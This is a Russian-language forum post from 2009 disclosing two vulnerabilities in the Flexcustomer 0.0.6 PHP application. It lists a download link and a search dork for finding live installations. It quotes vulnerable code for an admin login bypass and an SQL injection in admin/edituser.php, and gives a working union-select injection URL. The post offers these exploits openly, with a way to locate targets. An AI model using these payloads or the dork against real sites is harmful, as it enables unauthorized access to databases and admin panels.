02.06.2009, 09:17
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Уязвимости Flexcustomer
Уязвимости Flexcustomer 0.0.6 (возможно уязвимы и более ранние версии)
download: http://www.china-on-site.com/flexcust/flexcusten.zip
dork: "Powered by Flexcustomer"
1) [bypass] (требования: magic_quotes=off)
не заметил, бага в паблике, но для следующей уязвимости она понадобится...
admin/usercheck.php
уязвимый код:
PHP код:
if (!empty($logincheck)){
$sql = "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";
эксплуатирование:
2) [SQL-injection] (требования: magic_quotes=off, доступ в админ панель)
/admin/edituser.php
уязвимый код:
PHP код:
<?php
$userinfo = $db->getuserinfobyid($cid);
/CustomSql.inc
PHP код:
function getuserinfobyid($customerid)
{
$sql = "select * from customer where customerid='$customerid'";
$result = $this->select($sql);
return $result;
}
эксплуатирование:
/admin/edituser.php?cid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
Последний раз редактировалось Iceangel_; 02.06.2009 в 09:34..
|
|
|